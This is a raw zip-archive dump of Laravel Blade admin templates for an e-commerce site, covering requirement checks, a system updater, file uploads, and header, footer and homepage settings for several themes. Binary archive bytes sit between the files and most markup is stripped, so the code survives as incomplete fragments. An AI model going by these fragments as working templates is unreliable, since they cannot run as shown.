    max_execution_time @if(ini_get('max_execution_time') == '-1') Unlimited @else {{ ini_get('max_execution_time') }} @endif 600+ @if (ini_get('max_execution_time') == -1 || ini_get('max_execution_time') >= 600) @else @endif
    max_input_time @if(ini_get('max_input_time') == '-1') Unlimited @else {{ ini_get('max_input_time') }} @endif 120+ @if (ini_get('max_input_time') == -1 || ini_get('max_input_time') >= 120) @else @endif
    max_input_vars {{ ini_get('max_input_vars') }} 1000+ @if (ini_get('max_input_vars') >= 1000) @else @endif
    memory_limit @if(ini_get('memory_limit') == '-1') Unlimited @else {{ ini_get('memory_limit') }} @endif 256M+ @php $memory_limit = ini_get('memory_limit'); if (preg_match('/^(\d+)(.)$/', $memory_limit, $matches)) { if ($matches[2] == 'G') { $memory_limit = $matches[1] * 1024 * 1024 * 1024; // nnnM -> nnn GB } else if ($matches[2] == 'M') { $memory_limit = $matches[1] * 1024 * 1024; // nnnM -> nnn MB } else if ($matches[2] == 'K') { $memory_limit = $matches[1] * 1024; // nnnK -> nnn KB } } @endphp @if (ini_get('memory_limit') == -1 || $memory_limit >= (256 * 1024 * 1024)) @else @endif

    {{ translate('Extensions information') }}

    @php $loaded_extensions = get_loaded_extensions(); $required_extensions = ['bcmath', 'ctype', 'json', 'mbstring', 'zip', 'zlib', 'openssl', 'tokenizer', 'xml', 'dom', 'curl', 'fileinfo', 'gd', 'pdo_mysql'] @endphp @foreach ($required_extensions as $extension) @endforeach
    {{ translate('Extension Name') }} {{ translate('Status') }}
    {{ $extension }} @if(in_array($extension, $loaded_extensions)) @else @endif

    {{ translate('Filesystem Permissions') }}

    @php $required_paths = ['.env', 'public', 'app/Providers', 'app/Http/Controllers', 'storage', 'resources/views'] @endphp @foreach ($required_paths as $path) @endforeach
    {{ translate('File or Folder') }} {{ translate('Status') }}
    {{ $path }} @if(is_writable(base_path($path))) @else @endif
    @endsection PK�N]�c_*xx0views/backend/system/sitemap_generator.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Sitemap Generator') }}

    {{ translate('Current verion') }}: {{ get_setting('current_version') }}
    @csrf

    {{ translate('Sitemap Generation History') }}

    @if($file_info != null) @foreach($file_info as $key => $info) @endforeach @endif
    # {{ translate('File Name') }} {{ translate('File Size') }} {{ translate('Last Modified') }} {{ translate('Mime Type') }} {{ translate('Sitemap URL') }} {{ translate('Actions') }}
    {{ $key+1 }} {{ $info['file_name'] }} {{ $info['file_size'] }} {{ $info['last_modified'] }} {{ $info['mime_type'] }} {{ $info['url'] }}
    @csrf
    @csrf
    @endsection PK�N]�{�B��%views/backend/system/update.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Update your system') }}

    {{ translate('Current verion') }}: {{ get_setting('current_version') }}
    • {{ translate('Make sure your server has matched with all requirements.') }} {{ translate('Check Here') }}
    • {{ translate('Download latest version from codecanyon.') }}
    • {{ translate('Extract downloaded zip. You will find updates.zip file in those extraced files.') }}
    • {{ translate('Upload that zip file here and click update now.') }}
    • {{ translate('If you are using any addon make sure to update those addons after updating.') }}
    • {{ translate('Please turn off maintenance mode before updating.') }}
    • {{ translate('You can autometically update from previous 10 (ten) version.') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @endsection PK�N]y\iW��-views/backend/uploaded_files/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('Upload New File')}}

    {{translate('Drag & drop your files')}}
    @endsection @section('script') @endsectionPK�N]�K��� � ,views/backend/uploaded_files/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{translate('All uploaded files')}}

    {{translate('All files')}}
    @foreach($all_uploads as $key => $file) @php if($file->file_original_name == null){ $file_name = translate('Unknown'); }else{ $file_name = $file->file_original_name; } $file_path = my_asset($file->file_name); if($file->external_link) { $file_path = $file->external_link; } @endphp
    @if($file->type == 'image') @elseif($file->type == 'video') @else @endif
    {{ $file_name }} .{{ $file->extension }}

    {{ formatBytes($file->file_size) }}

    @endforeach
    {{ $all_uploads->appends(request()->input())->links() }}
    @endsection @section('modal') @include('modals.delete_modal') @include('modals.bulk_delete_modal') @endsection @section('script') @endsectionPK�N]�!X��+views/backend/uploaded_files/info.blade.phpnu�[���
    @php if($file->file_original_name == null){ $file_name = translate('Unknown'); }else{ $file_name = $file->file_original_name; } @endphp {{ translate('Download') }}
    PK�N]d���,�,3views/backend/website_settings/appearance.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('General Settings') }}
    @csrf
    {{ translate('Hex Color Code') }}
    {{ translate('Hex Color Code') }}
    {{ translate('Hex Color Code') }}
    {{ translate('Hex Color Code') }}
    {{ translate('Image Watermark') }}
    @csrf
    {{translate('Use Image Watermark (During Upload)')}}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Do not use "svg" image.') }}
    @endsection @section('script') @endsectionPK�N]�K(�9�9Gviews/backend/website_settings/authentication_layout_settings.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Authentication Page Layout') }}

    @csrf @php $authentication_layout = get_setting('authentication_layout_select'); @endphp
    {{ translate('Authentication Layout 1 - Boxed') }} {{ translate('View') }}
    {{ translate('Authentication Layout 2 - Free') }} {{ translate('View') }}
    {{ translate('Authentication Layout 3 - Focused') }} {{ translate('View') }}

    {{ translate('Configure your authentication page layout') }}

    {{ translate('Each page contain different layout, choose one to bundle it in your Layout.') }}

    {{ translate('Authentication Page Images') }}

    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose Files') }}
    {{ translate("Minimum dimensions required: 960px width X 911px height.") }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 945px width X 839px height.") }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 937px width X 965px height.") }}
    @if (get_setting('vendor_system_activation') == 1)
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 945px width X 839px height.") }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 945px width X 1036px height.") }}
    @endif @if (addon_is_activated('delivery_boy'))
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 945px width X 839px height.") }}
    @endif
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 945px width X 839px height.") }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 945px width X 839px height.") }}
    @if (addon_is_activated('otp_system'))
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 945px width X 839px height.") }}
    @endif
    @endsection @section('modal')
    img-show
    @endsection @section('script') @endsection PK�N]���~�~/views/backend/website_settings/footer.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Website Footer') }}

    {{ translate('Sub Footer') }}
    @csrf
    {{ translate('Show Full Width Sub Footer') }}
    {{ translate('Enable Sub Footer') }}
    {{ translate('Policy Section') }}
    @csrf
    {{ translate('Show Full Width Policy Section') }}
    {{ translate('Enable Policy Section') }}
    {{ translate('Footer Design') }}
    @csrf
    {{ translate('Show Full Width Footer') }}
    {{ translate('About Widget') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 275px width X 44px height.") }}
    {{ translate('Social Link Widget') }}
    @csrf
    {{ translate('Enable Social Links?') }}
    {{ translate('Contact Info Widget') }}
    @csrf
    {{ translate('Quick Links') }}
    @csrf
    ' data-target=".w3-links-target"> {{ translate('Add New') }}
    {{ translate('App Links') }}
    @csrf
    {{ translate('Enable Play Store Link') }}
    {{ translate('Enable App Store Link') }}
    @if ((get_setting('vendor_system_activation') == 1) || addon_is_activated('delivery_boy')) @if (get_setting('vendor_system_activation') == 1)
    {{ translate('Enable Seller App Link') }}
    @endif @if (addon_is_activated('delivery_boy'))
    {{ translate('Enable Delivery Boy App Link') }}
    @endif @endif
    {{ translate('Copyright Widget ') }}
    @csrf
    {{ translate('Payment Methods') }}
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 144px width X 20px height.") }}
    @endsection PK�N],8�>�>/views/backend/website_settings/header.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Selected Header') }}

    @include('header.' .get_element_type_by_id(get_setting('header_element')))
    {{ translate('Header Setting') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 244px width X 40px height.") }}
    @foreach($element_type->element_styles as $style)
    @endforeach
    @if (get_setting('header_menu_labels') != null) @foreach (json_decode(get_setting('header_menu_labels'), true) as $key => $value)
    @endforeach @endif
    ' data-target=".header-nav-menu"> {{ translate('Add New') }}

    @endsection {{-- modal --}} @section('modal')
    img-show
    @endsection @section('script') {{-- Language,currency, stikcy header visibility --}} {{-- top_header_bg_color --}} {{-- middle_header_bg_color --}} {{-- bottom_header_bg_color --}} {{-- top_header_text_color --}} {{-- middle_header_text_color --}} {{-- bottom_header_text_color --}} @endsectionPK�N]��QG3�3�Eviews/backend/website_settings/pages/classic/home_page_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Homepage Settings (Classic)') }}

    {{-- --}}
    @csrf
    {{ translate('Minimum dimensions required: 1100px width X 460px height.') }}
    {{ translate('We have limited banner height to maintain UI. We had to crop from both left & right side in view for different devices to make it responsive. Before designing banner keep these points in mind.') }}
    @php $home_slider_images = get_setting('home_slider_images', null, $lang); $home_slider_links = get_setting('home_slider_links', null, $lang); @endphp @if ($home_slider_images != null) @foreach (json_decode($home_slider_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-slider-target"> {{ translate('Add New') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 1370px width X 242px height.") }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 400px width X 200px height.") }}
    @php $todays_deal_bg_color = get_setting('todays_deal_bg_color'); @endphp
    @php $todays_deal_banner_text_color = get_setting('todays_deal_banner_text_color'); @endphp
    ' data-target=".home-banner1-target"> {{ translate('Add New') }}
    @csrf
    {{ translate("Minimum dimensions required: 1370px width X 360px height (If use a single banner).") }}
    @php $home_preorder_banner_1_images = get_setting('home_preorder_banner_1_images', null, $lang); $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp @if ($home_preorder_banner_1_images != null) @foreach (json_decode($home_preorder_banner_1_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-preorder_banner_1-target"> {{ translate('Add New') }}
    ' data-target=".home-banner2-target"> {{ translate('Add New') }}
    ' data-target=".home-banner3-target"> {{ translate('Add New') }}
    @if(addon_is_activated('auction'))
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 435px width X 485px height.") }}
    @endif @if(get_setting('coupon_system') == 1)
    @csrf
    @endif
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf
    @php $home_categories = get_setting('home_categories'); @endphp @if ($home_categories != null) @php $categories = \App\Models\Category::where('parent_id', 0)->with('childrenCategories')->get(); @endphp @foreach (json_decode($home_categories, true) as $key => $value)
    @endforeach @endif
    ' data-target=".home-categories-target"> {{ translate('Add New') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf
    @endsection @section('script') @endsection PK�N]ئ�e��Cviews/backend/website_settings/pages/contact_us_page_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @if (auth()->user()->can('smtp_settings') && env('MAIL_USERNAME') == null && env('MAIL_PASSWORD') == null)
    {{ translate('Please Configure SMTP Setting to work all email sending functionality') }}, {{ translate('Configure Now') }}
    @endif

    {{ translate('Contact Us Page Information') }}

    @csrf
    {{ translate('Page Content') }}
    @if($page->type == 'custom_page')
    {{ route('home') }}/
    @else @endif
    {{ translate('Use character, number, hypen only') }}
    @php $content = json_decode($page->getTranslation('content',$lang)); @endphp
    {{ translate('Seo Fields') }}
    {{ translate('Separate with coma') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @endsection PK�N]z6����5views/backend/website_settings/pages/create.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Add New Page') }}

    @csrf
    {{ translate('Page Content') }}
    {{ route('home') }}/
    {{ translate('Use character, number, hypen only') }}
    {{ translate('Seo Fields') }}
    {{ translate('Separate with coma') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @endsection PK�N]]OY�dd3views/backend/website_settings/pages/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Edit Page Information') }}

    @csrf
    {{ translate('Page Content') }}
    @if($page->type == 'custom_page')
    {{ route('home') }}/
    @else @endif
    {{ translate('Use character, number, hypen only') }}
    {{ translate('Seo Fields') }}
    {{ translate('Separate with coma') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @endsection PK�N]�ʯ)��;views/backend/website_settings/pages/element/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Element Information') }}
    @csrf
    @endsection PK�N]pᨁ � Iviews/backend/website_settings/pages/element/element_style/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Element Type Information') }}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 150px width X 150px height.') }}
    {{--
    --}}
    @endsectionPK�N]쫍�Y1Y1Jviews/backend/website_settings/pages/element/element_style/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Element Type Details') }}

    {{ $element_type->name }}
    @foreach ($all_element_styles as $key => $element_style) @endforeach
    # {{ translate('Name') }} {{translate('Value')}} {{ translate('Action') }}
    {{ $key + 1 }} {{ $element_style->name }} {{ $element_style->value }} @can('delete_element_style') @endcan
    @can('add_element_styles')
    {{ translate('Add New Element Style') }}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    @endcan
    @endsection @section('modal') @include('modals.delete_modal') @endsectionPK�N]<�R��Hviews/backend/website_settings/pages/element/element_type/edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Element Type Information') }}
    @csrf
    {{--
    --}}
    @endsectionPK�N]�Q��ooIviews/backend/website_settings/pages/element/element_type/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Element Details') }}

    {{ $element->getTranslation('name') }}
    @foreach ($all_element_types as $key => $element_type) @endforeach
    # {{ translate('Type') }} {{translate('Image')}} {{ translate('Action') }}
    {{ $key + 1 }} {{ $element_type->name }} @if($element_type->image_id != null) {{translate('Image')}} @else — @endif @can('view_element_styles') @endcan @can('edit_element_type') @endcan @can('delete_element_type') @endcan
    @can('add_element_types')
    {{ translate('Add New Element Type') }}
    @if ($errors->any())
      @foreach ($errors->all() as $error)
    • {{ $error }}
    • @endforeach
    @endif
    @csrf
    @endcan
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]��<views/backend/website_settings/pages/element/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('All Elements') }}

    {{ translate('Elements') }}
    @foreach ($elements as $key => $element) @endforeach
    # {{ translate('Name') }} {{ translate('Options') }}
    {{ $key + 1 }} {{ $element->getTranslation('name') }} @can('view_element_types') @endcan @can('edit_element') @endcan @can('delete_element') @endcan
    {{ $elements->links() }}
    @can('add_element')
    {{ translate('Add New Element') }}
    @csrf
    @endcan
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]ɪ �9�9�=views/backend/website_settings/pages/home_page_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
    {{ translate('Home Page Settings') }}
    @php $activeLanguages = get_all_active_language(); $defaultLanguage = env('DEFAULT_LANGUAGE'); @endphp {{-- Home Slider --}}
    {{ translate('Home Slider') }}
    {{ translate('We have limited banner height to maintain UI. We had to crop from both left & right side in view for different devices to make it responsive. Before designing banner keep these points in mind.') }}
    @csrf
    @if (get_setting('home_slider_images') != null) @foreach (json_decode(get_setting('home_slider_images'), true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @if($lang == $defaultLanguage)
    @endif
    @endforeach @endif
    @if($lang == $defaultLanguage)
    {{ translate('Choose File') }}
    ' data-target=".home-slider-target"> {{ translate('Add New') }} @endif
    {{-- Today's deal --}}
    {{ translate("Today's deal") }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{-- Home Banner 1 --}}
    {{ translate('Home Banner 1 (Max 3)') }}
    @csrf
    @if (get_setting('home_banner1_images') != null) @foreach (json_decode(get_setting('home_banner1_images'), true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @if($lang == $defaultLanguage)
    @endif
    @endforeach @endif
    @if($lang == $defaultLanguage)
    {{ translate('Choose File') }}
    ' data-target=".home-banner1-target"> {{ translate('Add New') }} @endif
    {{-- Home Banner 2 --}}
    {{ translate('Home Banner 2 (Max 3)') }}
    @csrf
    @if (get_setting('home_banner2_images') != null) @foreach (json_decode(get_setting('home_banner2_images'), true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @if($lang == $defaultLanguage)
    @endif
    @endforeach @endif
    @if($lang == $defaultLanguage)
    {{ translate('Choose File') }}
    ' data-target=".home-banner2-target"> {{ translate('Add New') }} @endif
    {{-- Home Banner 3 --}}
    {{ translate('Home Banner 3 (Max 3)') }}
    @csrf
    @if (get_setting('home_banner3_images') != null) @foreach (json_decode(get_setting('home_banner3_images'), true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @if($lang == $defaultLanguage)
    @endif
    @endforeach @endif
    @if($lang == $defaultLanguage)
    {{ translate('Choose File') }}
    ' data-target=".home-banner3-target"> {{ translate('Add New') }} @endif
    {{-- Auction Banner --}} @if(addon_is_activated('auction'))
    {{ translate('Auction Banner') }}
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endif {{-- Coupon system --}} @if(get_setting('coupon_system') == 1)
    {{ translate('Coupon Section') }}
    @csrf
    @endif {{-- Home categories--}}
    {{ translate('Home Categories') }}
    @csrf
    @if (get_setting('home_categories') != null) @foreach (json_decode(get_setting('home_categories'), true) as $key => $value)
    @endforeach @endif
    ' data-target=".home-categories-target"> {{ translate('Add New') }}
    {{-- Classified Banner --}}
    {{ translate('Classified Ads Banner') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{-- Top 10 --}}
    {{ translate('Top 12') }}
    @csrf
    @endsection @section('script') @endsection PK�N]-�ȸ��4views/backend/website_settings/pages/index.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Website Pages') }}

    @can('add_website_page')
    {{ translate('All Pages') }}
    {{ translate('Add New Page') }}
    @endcan
    @foreach ($page as $key => $page) @endforeach
    # {{translate('Name')}} {{translate('URL')}} {{translate('Actions')}}
    {{ $key+1 }} {{ $page->getTranslation('title') }} {{ route('home') }}/{{ $page->slug }} @can('edit_website_page') @if($page->type == 'home_page') @elseif($page->type == 'resources_page') @elseif($page->type == 'news_page') @elseif($page->type == 'about_us_page') @elseif($page->type == 'join_us_page') @elseif($page->type == 'plans_package_page') @else @endif @endcan @if($page->type == 'custom_page' && auth()->user()->can('delete_website_page')) @endif
    @endsection @section('modal') @include('modals.delete_modal') @endsection PK�N]k�V(K(KFviews/backend/website_settings/pages/megamart/home_page_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Homepage Settings (Megamart)') }}

    {{-- --}}
    @csrf

    {{ translate("Slider Section Settings") }}

    {{ translate('Minimum dimensions required: 1903px width X 553px height.') }}
    {{ translate('We have limited banner height to maintain UI. We had to crop from both left & right side in view for different devices to make it responsive. Before designing banner keep these points in mind.') }}
    @php $home_slider_images = get_setting('home_slider_images', null, $lang); $home_slider_links = get_setting('home_slider_links', null, $lang); @endphp @if ($home_slider_images != null) @foreach (json_decode($home_slider_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-slider-target"> {{ translate('Add New') }}
    @csrf

    {{ translate("Flash Deal Section Settings") }}

    @php $flash_deal_banner_text_color = get_setting('flash_deal_banner_menu_text'); @endphp
    @csrf

    {{ translate("Today's Deal Section Settings") }}

    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 1370px width X 242px height.") }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 400px width X 200px height.") }}
    @php $todays_deal_bg_color = get_setting('todays_deal_bg_color') @endphp
    @php $todays_deal_banner_text_color = get_setting('todays_deal_banner_text_color'); @endphp
    ' data-target=".home-banner1-target"> {{ translate('Add New') }}
    @csrf
    {{ translate("Minimum dimensions required: 1370px width X 360px height (If use a single banner).") }}
    @php $home_preorder_banner_1_images = get_setting('home_preorder_banner_1_images', null, $lang); $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp @if ($home_preorder_banner_1_images != null) @foreach (json_decode($home_preorder_banner_1_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-preorder_banner_1-target"> {{ translate('Add New') }}
    ' data-target=".home-banner2-target"> {{ translate('Add New') }}
    ' data-target=".home-banner3-target"> {{ translate('Add New') }}
    ' data-target=".home-banner4-target"> {{ translate('Add New') }}
    @csrf
    ' data-target=".home-banner5-target"> {{ translate('Add New') }}
    ' data-target=".home-banner6-target"> {{ translate('Add New') }}
    @if(addon_is_activated('auction'))
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 435px width X 485px height.") }}
    @endif @if(get_setting('coupon_system') == 1)
    @csrf
    @php $coupon_background_color = get_setting('cupon_background_color') @endphp
    @endif
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf
    {{ translate("Minimum dimensions required: 315px width X 370px height.") }}
    @php $featuredPreorder_images = get_setting('featuredPreorder_images', null, $lang); $featuredPreorder_links = get_setting('featuredPreorder_links', null, $lang); @endphp @if ($featuredPreorder_images != null) @foreach (json_decode($featuredPreorder_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-banner1-target"> {{ translate('Add New') }}
    @csrf
    @php $home_categories = get_setting('home_categories'); @endphp @if ($home_categories != null) @php $categories = \App\Models\Category::where('parent_id', 0)->with('childrenCategories')->get(); @endphp @foreach (json_decode($home_categories, true) as $key => $value)
    @endforeach @endif
    ' data-target=".home-categories-target"> {{ translate('Add New') }}
    @endsection @section('script') @endsection PK�N]AH������Cviews/backend/website_settings/pages/metro/home_page_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Homepage Settings (Metro)') }}

    {{-- --}}
    @csrf
    {{ translate('Minimum dimensions required: 1903px width X 553px height.') }}
    {{ translate('We have limited banner height to maintain UI. We had to crop from both left & right side in view for different devices to make it responsive. Before designing banner keep these points in mind.') }}
    @php $home_slider_images = get_setting('home_slider_images', null, $lang); $home_slider_links = get_setting('home_slider_links', null, $lang); @endphp @if ($home_slider_images != null) @foreach (json_decode($home_slider_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-slider-target"> {{ translate('Add New') }}
    @csrf

    {{ translate("Flash Deal Section Settings") }}

    @php $flash_deal_banner_text_color = get_setting('flash_deal_banner_menu_text'); @endphp
    @csrf

    {{ translate("Today's Deal Section Settings") }}

    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 1370px width X 242px height.") }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 400px width X 200px height.") }}
    @php $todays_deal_bg_color = get_setting('todays_deal_bg_color') @endphp
    @php $todays_deal_banner_text_color = get_setting('todays_deal_banner_text_color'); @endphp
    ' data-target=".home-banner1-target"> {{ translate('Add New') }}
    @csrf
    {{ translate("Minimum dimensions required: 1370px width X 360px height (If use a single banner).") }}
    @php $home_preorder_banner_1_images = get_setting('home_preorder_banner_1_images', null, $lang); $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp @if ($home_preorder_banner_1_images != null) @foreach (json_decode($home_preorder_banner_1_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-preorder_banner_1-target"> {{ translate('Add New') }}
    ' data-target=".home-banner2-target"> {{ translate('Add New') }}
    ' data-target=".home-banner3-target"> {{ translate('Add New') }}
    @if(addon_is_activated('auction'))
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 435px width X 485px height.") }}
    @endif @if(get_setting('coupon_system') == 1)
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate('Minimum dimensions required: 552px width X 322px height.') }}
    @php $coupon_background_color = get_setting('cupon_background_color') @endphp
    @endif
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf
    @php $home_categories = get_setting('home_categories'); @endphp @if ($home_categories != null) @php $categories = \App\Models\Category::where('parent_id', 0)->with('childrenCategories')->get(); @endphp @foreach (json_decode($home_categories, true) as $key => $value)
    @endforeach @endif
    ' data-target=".home-categories-target"> {{ translate('Add New') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf
    @endsection @section('script') @endsection PK�N]��UmooDviews/backend/website_settings/pages/minima/home_page_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Homepage Settings (Minima)') }}

    {{-- --}}
    @csrf
    {{ translate('Minimum dimensions required: 1903px width X 820px height.') }}
    {{ translate('We have limited banner height to maintain UI. We had to crop from both left & right side in view for different devices to make it responsive. Before designing banner keep these points in mind.') }}
    @php $home_slider_images = get_setting('home_slider_images', null, $lang); $home_slider_links = get_setting('home_slider_links', null, $lang); @endphp @if ($home_slider_images != null) @foreach (json_decode($home_slider_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-slider-target"> {{ translate('Add New') }}
    @csrf

    {{ translate("Flash Deal Card Settings") }}

    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 436px width X 234px height.") }}
    @php $flash_deal_card_text_color = get_setting('flash_deal_card_text'); @endphp
    @csrf

    {{ translate("Today's Deal Card Settings") }}

    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 436px width X 234px height.") }}
    @php $todays_deal_card_text_color = get_setting('todays_deal_card_text'); @endphp
    @csrf

    {{ translate("New Product Card Settings") }}

    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 436px width X 234px height.") }}
    @php $new_product_card_text_color = get_setting('new_product_card_text'); @endphp
    ' data-target=".home-banner1-target"> {{ translate('Add New') }}
    @csrf
    {{ translate("Minimum dimensions required: 1370px width X 360px height (If use a single banner).") }}
    @php $home_preorder_banner_1_images = get_setting('home_preorder_banner_1_images', null, $lang); $home_preorder_banner_1_links = get_setting('home_preorder_banner_1_links', null, $lang); @endphp @if ($home_preorder_banner_1_images != null) @foreach (json_decode($home_preorder_banner_1_images, true) as $key => $value)
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    @endforeach @endif
    {{ translate('Choose File') }}
    ' data-target=".home-preorder_banner_1-target"> {{ translate('Add New') }}
    ' data-target=".home-banner2-target"> {{ translate('Add New') }}
    ' data-target=".home-banner3-target"> {{ translate('Add New') }}
    @if(addon_is_activated('auction'))
    @csrf
    {{ translate('Browse')}}
    {{ translate('Choose File') }}
    {{ translate("Minimum dimensions required: 435px width X 485px height.") }}
    @endif @if(get_setting('coupon_system') == 1)
    @csrf
    @php $coupon_background_color = get_setting('cupon_background_color') @endphp
    @endif
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf
    @php $home_categories = get_setting('home_categories'); @endphp @if ($home_categories != null) @php $categories = \App\Models\Category::where('parent_id', 0)->with('childrenCategories')->get(); @endphp @foreach (json_decode($home_categories, true) as $key => $value)
    @endforeach @endif
    ' data-target=".home-categories-target"> {{ translate('Add New') }}
    @csrf
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    {{ translate('Browse') }}
    {{ translate('Choose File') }}
    @csrf
    @endsection @section('script') @endsection PK�N]Ph$dfdfGviews/backend/website_settings/pages/reclassic/home_page_edit.blade.phpnu�[���@extends('backend.layouts.app') @section('content')

    {{ translate('Homepage Settings (Re-Classic)') }}

    {{-- --}}
    @csrf
    {{ translate('Minimum dimensions required: 810px width X 350px height.') }}
